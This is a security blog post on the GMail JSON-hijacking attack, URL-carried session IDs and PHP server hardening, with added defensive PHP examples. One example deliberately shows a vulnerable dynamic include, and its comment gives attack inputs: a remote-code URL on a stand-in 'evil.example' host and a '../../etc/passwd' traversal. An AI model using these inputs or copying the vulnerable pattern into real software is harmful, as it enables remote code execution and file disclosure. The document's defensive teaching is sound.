The thing on everybody’s mind is the recent GMail hack. You can read a very good writeup about it on Joe Walker’s Blog. In short: the attacker’s page loads GMail’s JSON contacts feed with a `<script>` tag, the victim’s browser sends the GMail cookies along with that request, and the attacker’s script gets to read the returned data. You can avoid it (if you are an application developer) by
- Not serving sensitive data as bare JSON (or anything else that parses as JavaScript) from a GET URL; a response that a `<script>` tag cannot execute is a response it cannot read
- Not using cookies to store the session ID, but rather including the session ID in the URL. The attack works because the browser attaches cookies automatically; an ID carried in the URL is only sent when the page author put it there. Take care to mark all such content as non-cacheable, and tie the session to an IP address / user agent combination (this may break some proxy setups where the user can hop proxies unexpectedly, like AOL, but it makes a stolen ID far less useful). Be aware that IDs in URLs leak through Referer headers, browser history and server logs, so regenerate the ID at login and never accept an ID the server did not issue
- Including the session ID as part of the URL and then using mod_rewrite to turn it into something your scripts understand. In this case the URL would look like http://example.com/b2a5cc34fc21a764ae2fad94d56fadf6/index.php, which mod_rewrite transforms internally into http://example.com/index.php?sessionID=b2a5cc34fc21a764ae2fad94d56fadf6. Alternatively, if you don’t have mod_rewrite and can’t convince the SysAdmin to enable it for you, you can use the fact that Apache serves the longest leading part of the URL that points to a valid resource and hands the remainder to it as PATH_INFO: a request for http://example.com/index.php/b2a5cc34fc21a764ae2fad94d56fadf6 calls index.php, which can read the trailing part from $_SERVER['PATH_INFO'] and interpret it as the session ID. Whichever way you carry it, validate the ID (for example, exactly 32 hex characters) before handing it to the session layer.
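The following is an added PHP example (mine, not code from the post or from Joe Walker’s writeup) that puts the URL-carried session ID into practice: it accepts the ID from the rewritten query string or from PATH_INFO, validates its format, binds the session to the client’s IP address and user agent, refuses IDs the server never issued, and sends the no-cache headers. It assumes the mod_rewrite rule shown in the leading comment, a hypothetical private directory for session files, and PHP 7 or later; all names are illustrative.

```php
<?php
// Added example, not from the original post. Assumes this (hypothetical) .htaccess rule:
//   RewriteEngine On
//   RewriteRule ^([0-9a-f]{32})/(.*)$ /$2?sessionID=$1 [QSA,L]
// Without mod_rewrite, /index.php/<id> reaches index.php with "/<id>" in
// $_SERVER['PATH_INFO'] (requires Apache's AcceptPathInfo not to be Off).

declare(strict_types=1);

const SID_PATTERN = '/^[0-9a-f]{32}$/';

// Pick the session ID out of the request, accepting only the expected format.
function sessionIdFromRequest(array $get, array $server): ?string
{
    $candidate = $get['sessionID'] ?? null;
    if ($candidate === null && !empty($server['PATH_INFO'])) {
        $candidate = ltrim($server['PATH_INFO'], '/');
    }
    return (is_string($candidate) && preg_match(SID_PATTERN, $candidate) === 1) ? $candidate : null;
}

// Fingerprint the client so an ID copied to another address/browser is useless.
function clientFingerprint(array $server): string
{
    return hash('sha256', ($server['REMOTE_ADDR'] ?? '') . '|' . ($server['HTTP_USER_AGENT'] ?? ''));
}

function startUrlSession(array $get, array $server): string
{
    // Never read or write the ID through cookies, and do not let PHP rewrite links itself.
    ini_set('session.use_cookies', '0');
    ini_set('session.use_only_cookies', '0');
    ini_set('session.use_trans_sid', '0');
    ini_set('session.use_strict_mode', '1');   // reject IDs PHP did not generate
    // Private store: on shared hosting the default temp dir is readable by other accounts.
    // Hypothetical path; the directory must exist and be writable by the web server only.
    session_save_path(__DIR__ . '/../private/sessions');

    $sid = sessionIdFromRequest($get, $server);
    if ($sid !== null) {
        session_id($sid);
    }
    session_start();

    $fp = clientFingerprint($server);
    if ($sid === null || !isset($_SESSION['fp']) || !hash_equals($_SESSION['fp'], $fp)) {
        // Missing, unknown, attacker-chosen or hijacked ID: discard and issue a fresh one.
        session_unset();
        session_regenerate_id(true);
        $_SESSION['fp'] = $fp;
    }

    // Pages that carry the ID must never be cached by proxies or the browser.
    header('Cache-Control: no-store, no-cache, must-revalidate, private');
    header('Pragma: no-cache');
    header('Expires: 0');
    return session_id();
}

// Build links in the mod_rewrite form, /<id>/path, so the ID travels with every click.
function urlWithSession(string $path): string
{
    return '/' . session_id() . '/' . ltrim($path, '/');
}

// Typical use at the top of index.php:
$sid = startUrlSession($_GET, $_SERVER);
$_SESSION['visits'] = ($_SESSION['visits'] ?? 0) + 1;
echo '<a href="' . htmlspecialchars(urlWithSession('index.php')) . '">again</a>';
```

The fingerprint check is what turns an ID leaked through a Referer header or a log file into something the thief cannot use from their own machine; strict mode plus the regenerate-on-unknown-ID branch is what stops session fixation, where the attacker hands the victim a URL with an ID of the attacker’s choosing.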
Security blogger Martin McKeay is moving blogs. I myself prefer that others host my blog, because – aside from the fact that I’m a cheap bastard 🙂 – I don’t want to spend time tracking down all the security vulnerabilities that come out for the platform and defending against them. I’d rather leave it to the pros :). However, if you do want to put together your own server, here are some tips:
- Don’t go with shared hosting if possible! On shared hosting it is enough for one person to get hacked and you all are (this is not entirely true if the different users are well separated, but an attacker can still do pretty nasty things, like steal your sessions if you are using the default session management functions, whose files all land in the shared temp directory; at minimum point session.save_path at a directory only your account can read)
- Turn on PHP Safe mode (note that safe mode was never a real security boundary, is deprecated as of PHP 5.3 and removed in 5.4; open_basedir is the supported way to confine scripts to the site directory)
- Disallow inclusion of remote files (allow_url_include = Off, and allow_url_fopen = Off unless something actually needs it); this is what keeps an `include($_GET['page'])` bug from executing code fetched from the attacker’s server
- Use mod_security (a web application firewall module for Apache) and/or Suhosin (a hardening patch and extension for PHP)
- From the firewall, disallow all outbound connections the server does not need; a compromised script then cannot download a second-stage payload or report in to a botnet controller
Some of these steps might break applications (WordPress seems to run fine, but some plugins may break). These can be resolved by tweaking the code (preferred) or tweaking the configuration (not preferred). The idea is that you have a choice between becoming part of a 400-host botnet composed of compromised servers, which I saw just yesterday, or running securely.
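To make the “disallow inclusion of remote files” point concrete, here is an added PHP example (mine, not from the post) showing the include pattern that turns a page parameter into remote code execution, the hardened version that maps request values onto a fixed set of local files and confirms the resolved path stays inside the template directory, and a self-check that reports which of the php.ini settings listed above are still in their permissive state. Because safe mode no longer exists in current PHP, the check looks for open_basedir instead, as noted in the list. Page names, directories and the `evil.example` host are made up.

```php
<?php
// Added example, not from the original post.
declare(strict_types=1);

// VULNERABLE: with allow_url_include=On, ?page=http://evil.example/shell.txt runs the
// attacker's code on your server; even with it Off, ?page=../../etc/passwd or a path to
// an uploaded file is still included. The request decides what the server executes.
function renderPageVulnerable(string $page): void
{
    include $page;
}

// HARDENED: the request chooses a name, the code chooses the file.
const PAGES = ['home' => 'home.php', 'about' => 'about.php', 'contact' => 'contact.php'];

function resolvePage(string $page, string $templateDir): ?string
{
    if (!isset(PAGES[$page])) {
        return null;                       // unknown name: refuse rather than guess
    }
    $base = realpath($templateDir);
    $path = realpath($templateDir . '/' . PAGES[$page]);
    // realpath() resolves symlinks and '..'; insist the result is still under $templateDir.
    if ($base === false || $path === false || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

function renderPage(string $page, string $templateDir): void
{
    $path = resolvePage($page, $templateDir);
    if ($path === null) {
        http_response_code(404);
        return;
    }
    include $path;
}

// Self-check of the php.ini hardening from the list above; returns the settings still open.
function hardeningFindings(): array
{
    $shouldBeOff = [
        'allow_url_include' => 'include/require of http:// and ftp:// URLs',
        'allow_url_fopen'   => 'fopen()/file_get_contents() of URLs',
        'display_errors'    => 'paths and versions leaking through error messages',
        'expose_php'        => 'the X-Powered-By header advertising the PHP version',
    ];
    $findings = [];
    foreach ($shouldBeOff as $key => $why) {
        // ini_get() yields "" or "0" for Off and "1" for On; older builds may return "off"/"on".
        $value = strtolower((string) ini_get($key));
        $isOn  = !in_array($value, ['', '0', 'off', 'false'], true);
        if ($isOn) {
            $findings[] = "$key is On (allows $why); set it to Off in php.ini";
        }
    }
    if ((string) ini_get('open_basedir') === '') {
        $findings[] = 'open_basedir is unset; restrict PHP to the site directory';
    }
    return $findings;
}

// Typical use: fail loudly at deploy time rather than discovering the gap after the fact.
foreach (hardeningFindings() as $finding) {
    error_log('hardening: ' . $finding);
}
renderPage($_GET['page'] ?? 'home', __DIR__ . '/templates');   // hypothetical template dir
```

Note that the hardened `resolvePage()` does not rely on allow_url_include at all: the ini setting is defence in depth for the bugs you have not found yet, while the whitelist removes the bug from this code path entirely.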
A new security challenge: ngGames.
Via Ajaxian: Create your own WebTop in php/js in no time – if you don’t know what a webtop is (I didn’t), it’s a desktop replacement in the browser. I don’t like the idea, but it’s a cool technological demo.